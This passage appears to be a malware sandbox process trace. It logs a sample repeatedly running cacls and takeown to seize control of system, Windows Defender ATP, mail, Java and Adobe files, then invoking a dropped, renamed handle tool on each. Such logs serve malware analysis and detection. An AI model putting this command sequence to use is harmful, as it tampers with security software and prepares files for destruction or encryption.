C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "qmgr.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:4140 -
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "qmgr.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4156 -
C:\Users\Admin\AppData\Local\Temp\PsYzXFib64.exePsYzXFib.exe -accepteula "qmgr.db" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:4196
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db""2⤵
- Suspicious use of WriteProcessMemory
PID:4232 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db" /E /G Admin:F /C3⤵PID:4280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "SmsInterceptStore.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:4324 -
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "SmsInterceptStore.db" -nobanner4⤵
- Executes dropped EXE
PID:4340
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4364
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa""2⤵
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:4436
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:4456
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "classes.jsa" -nobanner3⤵PID:4480
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:4496
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa""2⤵PID:4568
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:4620
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:4640
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "classes.jsa" -nobanner3⤵PID:4660
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:4676
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4700
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵PID:4724
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:4772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵PID:4812
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵
- Executes dropped EXE
PID:4828
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files\Windows Mail\wab.exe""2⤵PID:4876
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:4924
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wab.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "wab.exe" -nobanner3⤵PID:4968
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "wab.exe" -nobanner4⤵
- Executes dropped EXE
PID:4984
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5008
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui""2⤵PID:5032
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui" /E /G Admin:F /C3⤵PID:5080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "BrowserCore.exe.mui" -nobanner3⤵PID:4104
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "BrowserCore.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4124
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4164
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files\Windows Mail\wabmig.exe""2⤵PID:4216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:3080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wabmig.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "wabmig.exe" -nobanner3⤵PID:4348
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "wabmig.exe" -nobanner4⤵
- Executes dropped EXE
PID:4356
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4384
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:4236
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:4472
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4500
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:4492
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "WinMail.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4532
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4420
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:4204
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:4684
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:4716
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "msoeres.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4600
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4584
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:4784
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:4824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4868
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:4756
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "ImagingDevices.exe" -nobanner4⤵
- Executes dropped EXE
PID:4744
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4936
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files\Windows Security\BrowserCore\manifest.json""2⤵PID:4952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\manifest.json" /E /G Admin:F /C3⤵PID:5024
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\manifest.json"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "manifest.json" -nobanner3⤵PID:4888
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "manifest.json" -nobanner4⤵
- Executes dropped EXE
PID:5096
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe""2⤵PID:4148
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe" /E /G Admin:F /C3⤵PID:5036
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "BrowserCore.exe" -nobanner3⤵PID:4304
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "BrowserCore.exe" -nobanner4⤵
- Executes dropped EXE
PID:4320
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4372
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe""2⤵PID:4380
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe" /E /G Admin:F /C3⤵PID:4248
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "SenseSampleUploader.exe" -nobanner3⤵PID:4516
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "SenseSampleUploader.exe" -nobanner4⤵
- Executes dropped EXE
PID:4432
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:4452
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:4692
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4616
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:4592
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4740
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:4768
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:4956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:4848
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "Workflow.Targets" -nobanner4⤵
- Executes dropped EXE
PID:5004
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4904
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe""2⤵PID:5092
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe" /E /G Admin:F /C3⤵PID:4972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5016
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "SenseCncProxy.exe" -nobanner3⤵PID:5056
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "SenseCncProxy.exe" -nobanner4⤵
- Executes dropped EXE
PID:1792
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2588
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe""2⤵PID:5076
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" /E /G Admin:F /C3⤵PID:4524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "MsSense.exe" -nobanner3⤵PID:4308
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "MsSense.exe" -nobanner4⤵
- Executes dropped EXE
PID:4292
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:4604
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:1636
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4632
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:4636
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4396
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4832
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:4776
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:5020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4976
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:504
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:5052
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4120
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui""2⤵PID:5088
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui" /E /G Admin:F /C3⤵PID:4464
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "MsSense.exe.mui" -nobanner3⤵PID:4664
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "MsSense.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4508
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4488
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files\Windows Mail\WinMail.exe""2⤵PID:4780
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:4404
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\WinMail.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "WinMail.exe" -nobanner3⤵PID:4596
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "WinMail.exe" -nobanner4⤵
- Executes dropped EXE
PID:4624
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4940
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H""2⤵PID:5064
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H" /E /G Admin:F /C3⤵PID:4992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4260
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "Identity-H" -nobanner3⤵PID:4720
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "Identity-H" -nobanner4⤵
- Executes dropped EXE
PID:3912
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3752
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V""2⤵PID:4416
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V" /E /G Admin:F /C3⤵PID:1728
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "Identity-V" -nobanner3⤵PID:4736
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "Identity-V" -nobanner4⤵
- Executes dropped EXE
PID:4964
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1772
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:5048
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:4808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:4444
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "Workflow.Targets" -nobanner4⤵
- Executes dropped EXE
PID:4708
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:64
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:4572
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:668
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:4336
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:3676
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3672
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""2⤵PID:4652
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:3736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "wabmig.exe" -nobanner3⤵PID:4928
